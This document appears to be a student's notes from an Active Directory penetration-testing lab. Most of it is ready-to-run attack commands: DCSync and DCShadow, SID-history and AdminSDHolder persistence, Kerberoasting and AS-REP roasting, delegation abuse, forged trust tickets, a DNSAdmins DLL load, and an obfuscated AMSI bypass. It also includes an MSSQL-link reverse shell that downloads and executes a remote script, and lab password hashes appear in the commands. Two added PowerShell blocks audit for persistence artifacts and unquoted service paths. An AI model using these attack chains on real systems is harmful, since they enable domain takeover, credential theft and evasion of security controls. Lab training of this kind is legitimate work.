PS C:\ad\Tools\AdExplorer> Enter-PSSession $sess2
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator
# PW2, check the access:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student90'}
```

### ACL: modification rights (DCSync)

```powershell
# PW2
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student90 -Rights DCSync -Verbose
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

### ACL: security descriptors

Allow WMI, PSRemoting and remote registry on the DC for student90: GUI (see video 5) OR:

```powershell
. .\Set-RemoteWMI.ps1
Set-RemoteWMI -UserName student90 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Get-WmiObject -class win32_operatingsystem -ComputerName dcorp-dc
Set-RemoteWMI -UserName student90 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose -Remove
. .\Set-RemotePSRemoting.ps1
Set-RemotePSRemoting -UserName student90 -ComputerName dcorp-dc -Verbose
Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc
Set-RemotePSRemoting -UserName student90 -ComputerName dcorp-dc -Verbose -Remove
PS C:\AD\Tools\DAMP-master\DAMP-master> . .\Add-RemoteRegBackdoor.ps1
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student90 -Verbose
. .\RemoteHashRetrieval.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose    # does not work
```

### SID history persistence

Set the SID history of a throwaway user to the 519 group (Enterprise Admins RID) in the account's attributes:

```powershell
.\PsExec.exe \\dcorp-dc -s cmd
mimikatz "privilege::debug" "sid::patch" "sid::add /sam:student90 /new:S-1-5-21-280534878-1496970234-700767426-519" "exit"
mimikatz "privilege::debug" "sid::patch" "sid::query /sam:student90" "exit"
```

### DCShadow

A fake DC: no logs on the modified objects.

Console 1:

```
mimikatz.exe
!+
!processtoken          # get SYSTEM
token::whoami
lsadump::dcshadow /object:root90user /attribute:Description /value="Hello from DCShadow"   # prepare the changes for the DC
```

Console 2:

```
mimikatz.exe
privilege::debug
sekurlsa::pth /user:Administrator /domain:moneycorp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate
lsadump::dcshadow /push    # push the changes to the DC (run as DA)
```

OR, as a non-DA user:

```powershell
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:moneycorp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /run:powershell.exe"'
. .\SetDCShadowPermissions.ps1
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root90user -Username student90 -Verbose   # lets student90 use DCShadow from machine mcorp-student1 to modify the root1user object
```

```
lsadump::dcshadow /object:root90user /attribute:Description /value="Hello from DCShadow with no DA"
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
```

```powershell
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl | Set-Clipboard
```

```
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<modified ACL>
lsadump::dcshadow /push    # run as student90
```
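Each persistence technique in this section leaves a durable artifact on the DC or in the directory: the `DsrmAdminLogonBehavior` value, the DNS `ServerLevelPluginDll` value (written by the `dnscmd /config /serverlevelplugindll` command used later in these notes), a registered SSP, an extra trustee on `AdminSDHolder`, and populated `sIDHistory`. The block below is an added example, not part of the original notes: a defender-side audit that collects those artifacts from a DC and evaluates them. The registry locations are the standard ones and the `AdminSDHolder` trustee baseline is my approximation of a default domain (replace it with your own); the sample state at the bottom is constructed to mirror the techniques above.

```powershell
# Added example (not from the original notes): audit for the persistence artifacts in this section.
# Assumptions: registry paths Lsa\DsrmAdminLogonBehavior, DNS\Parameters\ServerLevelPluginDll and
# Lsa\"Security Packages"; the AdminSDHolder baseline is approximate; the sample state is constructed.
$script:KnownSsp = 'kerberos','msv1_0','schannel','wdigest','tspkg','pku2u','cloudap',''
$script:AdminSDHolderBaseline = '\\Domain Admins$','\\Enterprise Admins$','^BUILTIN\\Administrators$',
    '^NT AUTHORITY\\SYSTEM$','^NT AUTHORITY\\SELF$','^NT AUTHORITY\\Authenticated Users$','^Everyone$',
    '\\Cert Publishers$','\\Pre-Windows 2000 Compatible Access$','\\Windows Authorization Access Group$',
    '\\Terminal Server License Servers$','\\Enterprise Key Admins$','\\Key Admins$'
$script:PrivilegedRids = '512','516','518','519','544'   # Domain Admins, DCs, Schema Admins, Enterprise Admins, Administrators

function Test-PersistenceIndicators {
    param([Parameter(Mandatory)][hashtable]$State)   # keys as produced by Get-PersistenceState
    $findings = @()
    $f = { param($Sev, $What, $Detail) [pscustomobject]@{ Severity = $Sev; Indicator = $What; Detail = $Detail } }

    # DSRM: 1 or 2 lets the DC's DSRM (local) administrator log on while AD is running
    if ($State.DsrmAdminLogonBehavior -in 1,2) {
        $findings += & $f 'High' 'DSRM logon enabled' "DsrmAdminLogonBehavior = $($State.DsrmAdminLogonBehavior)"
    }
    # DNS plugin DLL: loaded by dns.exe as SYSTEM on the DC
    if ($State.ServerLevelPluginDll) {
        $findings += & $f 'High' 'DNS ServerLevelPluginDll set' $State.ServerLevelPluginDll
    }
    # Persistent custom SSP (registry-registered variant of the in-memory memssp above)
    foreach ($ssp in @($State.SecurityPackages)) {
        if (-not $ssp) { continue }
        if ($ssp -notin $script:KnownSsp) { $findings += & $f 'High' 'Unknown SSP in Security Packages' $ssp }
    }
    # AdminSDHolder: any trustee outside the baseline is pushed to every protected object by SDProp
    foreach ($t in @($State.AdminSDHolderTrustees)) {
        if (-not $t) { continue }
        $known = $false
        foreach ($p in $script:AdminSDHolderBaseline) { if ($t -match $p) { $known = $true; break } }
        if (-not $known) { $findings += & $f 'High' 'Non-baseline trustee on AdminSDHolder' $t }
    }
    # sIDHistory: legitimate only after a migration; a privileged RID is never legitimate
    foreach ($entry in @($State.SidHistoryAccounts)) {   # "name=S-1-5-...-RID;S-1-5-...-RID"
        if (-not $entry) { continue }
        $sids = ($entry -split '=', 2)[1]
        $rids = @($sids -split ';' | ForEach-Object { ($_ -split '-')[-1] })
        $sev  = if ($rids | Where-Object { $_ -in $script:PrivilegedRids }) { 'High' } else { 'Review' }
        $findings += & $f $sev 'sIDHistory populated' $entry
    }
    $findings
}

# Collector for a live DC (run locally on the DC or via Invoke-Command; needs the AD module)
function Get-PersistenceState {
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $dns = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -ErrorAction SilentlyContinue
    $dn  = (Get-ADDomain).DistinguishedName
    @{
        DsrmAdminLogonBehavior = $lsa.DsrmAdminLogonBehavior
        ServerLevelPluginDll   = $dns.ServerLevelPluginDll
        SecurityPackages       = @($lsa.'Security Packages')
        AdminSDHolderTrustees  = @((Get-Acl "AD:\CN=AdminSDHolder,CN=System,$dn").Access | ForEach-Object { "$($_.IdentityReference)" } | Sort-Object -Unique)
        SidHistoryAccounts     = @(Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory |
                                   ForEach-Object { "$($_.Name)=$(@($_.sIDHistory | ForEach-Object { "$_" }) -join ';')" })
    }
}
# Test-PersistenceIndicators -State (Get-PersistenceState) | Format-Table -AutoSize

# Constructed sample state mirroring the techniques in this section
$sampleState = @{
    DsrmAdminLogonBehavior = 2
    ServerLevelPluginDll   = '\\172.16.100.90\dll\mimilib.dll'
    SecurityPackages       = 'kerberos','msv1_0','schannel','wdigest','tspkg','pku2u','mimilib'
    AdminSDHolderTrustees  = 'NT AUTHORITY\SYSTEM','BUILTIN\Administrators','DOLLARCORP\Domain Admins','DOLLARCORP\student90'
    SidHistoryAccounts     = 'student90=S-1-5-21-280534878-1496970234-700767426-519','migrated.user=S-1-5-21-111-222-333-1105'
}
Test-PersistenceIndicators -State $sampleState | Format-Table -AutoSize
# expected: 5 High findings (DSRM, DNS plugin, mimilib SSP, student90 on AdminSDHolder, student90 sIDHistory) and 1 Review
```

The skeleton key and `memssp` variants above live only in LSASS memory and leave nothing for this audit to read; for those the indicator is a DC reboot that "fixes" the behaviour, or LSASS process-access telemetry, not a registry or directory value.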
## Privilege escalation in the domain

### Kerberoast

An SPN must be unique across the domain.

```powershell
Get-NetUser -SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"   # request a TGS (check with klist) (!!! ONLY WORKS AS ADMINISTRATOR)
cd c:\ad\tools\kerberoast
. ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'   # save the TGS to disk
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\1-40a10000-student90@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi   # brute-force the TGS
```

Targeted kerberoast (set an SPN on a user we have write rights on):

```powershell
. .\Powerview_dev.ps1
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Get-DomainUser -Identity Support90User | select serviceprincipalname   # check the SPN
Set-DomainObject -Identity support90user -Set @{serviceprincipalname='ops/whatever90'}
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever90"
cd c:\ad\tools\kerberoast
. ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'   # save the TGS to disk
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\3-40a10000-student90@ops~whatever90-DOLLARCORP.MONEYCORP.LOCAL.kirbi   # brute-force the TGS
# OR PW3 (Get-DomainSPNTicket):
Get-DomainSPNTicket -SPN ops/whatever90 -OutputFormat Hashcat
```

### AS-REP roast

```powershell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth   # users with pre-authentication disabled
Get-DomainUser -PreauthNotRequired -Verbose
. .\Powerview_dev.ps1
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}   # find a user whose properties we can write
Set-DomainObject -Identity Control90User -XOR @{useraccountcontrol=4194304} -Verbose   # disable pre-authentication for Control90User
. .\ASREPRoast-master\ASREPRoast-master\ASREPRoast.ps1
Get-ASREPHash -UserName Control90User -Verbose   # get the AS-REP for brute-forcing
```

### Unconstrained delegation

```powershell
Get-DomainComputer -Unconstrained -Properties dnshostname
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /ntlm:d549831a955fee51a43c83efb3928fa7 /run:powershell.exe"'
. .\Powerview_dev.ps1
Find-LocalAdminAccess     # admin at dcorp-appsrv.dollarcorp.moneycorp.local
$sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local
Enter-PSSession $sess
# disable AMSI (or run Set-MpPreference -DisableRealtimeMonitoring $true):
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'   # save all tickets
ls | select name
[dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents> Invoke-Mimikatz -Command '"kerberos::ptt [0;3c282c]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
```

### Constrained delegation

```powershell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get-DomainUser -TrustedToAuth
```

kekeo:

```
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
```

```powershell
. ..\..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

Requesting PSRemoting (an alternate service name via the `|` syntax):

```powershell
PS C:\ad\Tools\kekeo\x64> .\kekeo.exe
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL|http/dcorp-mssql.dollarcorp.moneycorp.LOCAL
. ..\..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_http~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
PS C:\ad\Tools\kekeo\x64> .\kekeo.exe
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL|host/dcorp-mssql.dollarcorp.moneycorp.LOCAL
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_host~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```

```
PS C:\ad\Tools\kekeo\x64> klist

Current LogonId is 0:0xd54ae3

Cached Tickets: (2)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: host/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 8/18/2020 13:40:31 (local)
        End Time:   8/18/2020 23:37:09 (local)
        Renew Time: 8/25/2020 13:37:09 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 8/18/2020 13:39:03 (local)
        End Time:   8/18/2020 23:37:09 (local)
        Renew Time: 8/25/2020 13:37:09 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

PS C:\ad\Tools\kekeo\x64> Enter-PSSession -ComputerName dcorp-mssql.dollarcorp.moneycorp.LOCAL
[dcorp-mssql.dollarcorp.moneycorp.LOCAL]: PS C:\Users\Administrator.dcorp\Documents> exit
```

Constrained delegation on a computer account:

```powershell
Get-DomainComputer -TrustedToAuth
```

```
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:1e10c316aec409434ba0b138cdff841b
tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL
```

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

### DNSAdmins

```powershell
Get-DomainGroupMember -Identity "DNSAdmins"
PS C:\ad\Tools> . .\Invoke-Mimikatz.ps1
PS C:\ad\Tools> Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:a98e18228819e8eec3dfa33cb68b0728 /run:powershell.exe"'
# install the DNS server tools (dnscmd) first
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.100.90\dll\mimilib.dll
cmd
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns
```

## Privilege escalation across domains

1. Trust key:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
# OR
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:67071309d6ec0741a2a2e1241163b87e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
```

The inter-realm ticket will not automatically be exchanged for a TGS from moneycorp (for CIFS the client falls back to NTLM), so it cannot simply be injected with /ptt. The new kekeo does not work here: it cannot substitute the forest name.

```powershell
.\asktgs.exe trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
.\asktgs.exe trust_tkt.kirbi ldap/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\ldap.mcorp-dc.moneycorp.local.kirbi
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:moneycorp.local /user:mcorp\krbtgt"'   # does not work
```

2. SID History:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'
ls \\mcorp-dc.moneycorp.local\c$
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:moneycorp.local /user:mcorp\krbtgt"'
```

3. Unconstrained delegation on a DC + printer bug.

## Privilege escalation across forests

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"'
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:7d6a0c6386de5a544087702cd28292bd /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local
.\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi
ls \\eurocorp-dc.eurocorp.local\SharedwithDcorp\
```

## MSSQL: database links

- https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
- https://blog.netspi.com/sql-server-link-crawling-powerupsql/
- https://docs.microsoft.com/ru-ru/sql/t-sql/functions/openquery-transact-sql?view=sql-server-ver15 (using a link)

```powershell
PS C:\AD\Tools\PowerUpSQL-master\PowerUpSQL-master> Import-Module .\PowerUpSQL.psd1
Get-SQLInstanceDomain                                          # list of SQL servers
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose   # servers the current user can log on to
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose               # the current user's privileges on the SQL servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose                 # DB links
# heidisql: SQL client for running queries manually
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft   # command exec via links
```

Get a shell:

```powershell
PS C:\AD\Tools> . .\powercat.ps1
PS C:\AD\Tools> powercat -l -v -p 443 -t 1000
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.90/Invoke-PowerShellTcp.ps1'')'"
```

## Misc

```powershell
Invoke-HoneypotBuster -OpSec    # detect decoys automatically
# Invoke-Obfuscation: AMSI and script-block bypass
New-PSDrive -Name P -PSProvider FileSystem -Root \\USEREXAM\shared -Credential fortress\secureservicebkp
```
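Returning to the unquoted service path check in the PRIV ESC section: the note there that `C:\Program ..` is a false positive (creating `C:\Program.exe` needs admin rights) is the part that a raw `select name,pathname` cannot tell you. The block below is an added example, not part of the original notes: an audit that derives the intermediate file names Windows would try, then checks whether a low-privileged principal can actually create a file in the corresponding directory, skipping InheritOnly ACEs, which is precisely why the root of `C:\` comes out clean. It assumes `Win32_Service.PathName` via `Get-CimInstance`; the sample path strings are constructed (one of them is the Abyss path from the notes).

```powershell
# Added example (not from the original notes): audit for unquoted service paths, including the
# "C:\Program.exe is a false positive" rule. Assumptions: Win32_Service via Get-CimInstance;
# the sample PathName strings below are constructed.
function Get-UnquotedServiceCandidatePath {
    # Returns the file names Windows would try before the real binary for one PathName
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }                      # quoted: not vulnerable
    if (-not ($PathName -match '(?i)^(.+?\.exe)')) { return @() }      # no .exe to anchor on
    $exe = $Matches[1]
    if ($exe -notmatch ' ') { return @() }                             # no spaces: nothing to hijack
    $candidates = @()
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $candidates += ($exe.Substring(0, $idx) + '.exe')             # e.g. C:\WebServer\Abyss.exe
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
    $candidates
}

function Test-DirectoryCreateFilesByNonAdmin {
    # True if a low-privileged principal can create a file directly in $Directory
    param([Parameter(Mandatory)][string]$Directory,
          [string[]]$NonAdminPattern = @('\\Users$','Authenticated Users$','^Everyone$','\\INTERACTIVE$'))
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles   # = WriteData
    $inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ("$($ace.AccessControlType)" -ne 'Allow') { continue }
        # InheritOnly ACEs apply to children, not to this folder: this is why C:\ lets
        # Authenticated Users modify subfolders without letting them drop C:\Program.exe
        if (([int]$ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        $id = "$($ace.IdentityReference)"
        if (-not ($NonAdminPattern | Where-Object { $id -match $_ })) { continue }
        $rights = [int]$ace.FileSystemRights
        # CreateDirectories alone (what C:\ grants) is not enough; GENERIC_WRITE / GENERIC_ALL bits also count
        if (($rights -band $createFiles) -or ($rights -band 0x40000000) -or ($rights -band 0x10000000)) { return $true }
    }
    $false
}

function Find-UnquotedServicePath {
    # Live audit: every unquoted, space-containing service path, with a verdict per candidate directory
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName -and $_.PathName -notlike 'C:\Windows\*' }) {
        foreach ($cand in Get-UnquotedServiceCandidatePath -PathName $svc.PathName) {
            $dir = Split-Path -Path $cand -Parent
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                PathName    = $svc.PathName
                Candidate   = $cand
                Exploitable = Test-DirectoryCreateFilesByNonAdmin -Directory $dir
            }
        }
    }
}
# Find-UnquotedServicePath | Where-Object Exploitable | Format-Table -AutoSize

# Constructed samples: the Abyss path from the PRIV ESC section and a correctly quoted path
Get-UnquotedServiceCandidatePath -PathName 'C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service'
# -> C:\WebServer\Abyss.exe, C:\WebServer\Abyss Web.exe
Get-UnquotedServiceCandidatePath -PathName '"C:\Program Files\Vendor App\svc.exe" --service'
# -> (nothing)
```

The fix for a finding is the one PowerUp's output implies in reverse: quote the ImagePath in the service's registry key, and remove CreateFiles for non-admin principals from the directory, since a writable directory on the path remains a problem even after quoting if the real binary itself can be replaced.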